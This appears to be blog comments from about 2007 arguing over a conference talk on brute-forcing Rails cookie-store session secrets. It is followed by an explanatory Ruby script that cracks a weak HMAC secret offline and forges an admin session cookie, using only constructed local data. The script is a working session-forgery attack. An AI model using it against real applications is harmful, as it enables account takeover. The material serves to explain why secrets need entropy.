[...] See the “Part II” post for the BustRailsCookie script. [...]
I'm sorry to report that you spread FUD at the OWASP conference.
Remove the rev query parameter from the link to the cookie store source, or simply check out Rails trunk any time since March 3, 2007, and reconsider your claim.
I find this lack of diligence inexcusable when it's the basis for a talk at a security conference. Please consider correcting this and your earlier post.
There are legitimate concerns with the cookie store, but brute force attacks are not one of them.
Correction: the cracker itself does use the HMAC. All the other links are wrong. The concern regarding session secret strength is totally valid. See the discussion on the rails-core mailing list for more.
Here's a link to the rails-core mailing list where this topic is continued.
http://groups.google.com/group/rubyonrails-core/b…
To wrap up where things currently stand: yes, brute-forcing the cookie store hash is possible, as this script demonstrates (so choose a strong password, everyone!), and session replay is also possible (but there are probably ways to fix that). We seem to be in disagreement about whether this should be the default session store choice.
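To make concrete what the thread is arguing about, here is an added example. It is neither the BustRailsCookie script nor Rails' own code; it mimics, as an assumption, the cookie store's signed-cookie layout of the time: base64 of the Marshal'd session, then "--", then the hex HMAC-SHA1 of that base64 under the application's secret. Because the cookie is handed to the client, an attacker can test candidate secrets offline against its HMAC; a weak secret falls to a wordlist, after which any session contents can be minted. The session hash, wordlist and secrets are constructed for the demonstration.

```ruby
require 'openssl'

# Added example: an approximation of the Rails 2 cookie store format,
#   <base64(Marshal.dump(session))>--<hex HMAC-SHA1(secret, base64 part)>
# written from the thread's description, not copied from Rails.

def sign(payload, secret)
  OpenSSL::HMAC.hexdigest('sha1', secret, payload)
end

# Build a session cookie the way a cookie-store-backed app would.
def make_cookie(session, secret)
  data = [Marshal.dump(session)].pack('m0')   # strict base64, no newlines
  "#{data}--#{sign(data, secret)}"
end

# Constant-time comparison so the digest check itself leaks nothing.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) } == 0
end

# Verify the HMAC and decode; returns nil if the cookie was tampered with.
# Note the server Marshal.loads whatever carries a valid HMAC, so once the
# secret is known the attacker controls the whole unmarshalled object.
def read_cookie(cookie, secret)
  data, digest = cookie.split('--', 2)
  return nil unless data && digest
  return nil unless secure_compare(digest, sign(data, secret))
  Marshal.load(data.unpack1('m0'))
end

# Offline dictionary attack: the attacker already holds a cookie (their own
# session is enough), guesses the secret and checks the HMAC locally.
# Nothing touches the server, so rate limiting and logging never see it.
def crack_secret(cookie, wordlist)
  data, digest = cookie.split('--', 2)
  wordlist.find { |guess| sign(data, guess) == digest }
end

# With the secret recovered, mint a cookie carrying any session we like.
# Such a cookie also replays indefinitely: nothing in it expires until the
# secret is rotated.
def forge(cookie, wordlist, new_session)
  secret = crack_secret(cookie, wordlist)
  return nil unless secret
  make_cookie(new_session, secret)
end

if __FILE__ == $0
  # Constructed data: a weak app secret and a small wordlist that contains it.
  wordlist = %w[password letmein secret hunter2]
  weak_cookie = make_cookie({ :user_id => 42 }, 'secret')
  puts "recovered secret: #{crack_secret(weak_cookie, wordlist).inspect}"
  forged = forge(weak_cookie, wordlist, { :user_id => 1, :admin => true })
  puts "forged session accepted: #{read_cookie(forged, 'secret').inspect}"

  # A random 256-bit secret is outside any wordlist; the same attack fails.
  strong = OpenSSL::Random.random_bytes(32).unpack1('H*')
  strong_cookie = make_cookie({ :user_id => 42 }, strong)
  puts "strong secret recovered: #{crack_secret(strong_cookie, wordlist).inspect}"
end
```

The cost of the attack is one HMAC-SHA1 per guess, entirely on the attacker's hardware, which is why the thread's advice reduces to the secret's entropy: a dictionary word is gone in milliseconds, a 32-byte random secret is not reachable by guessing at all.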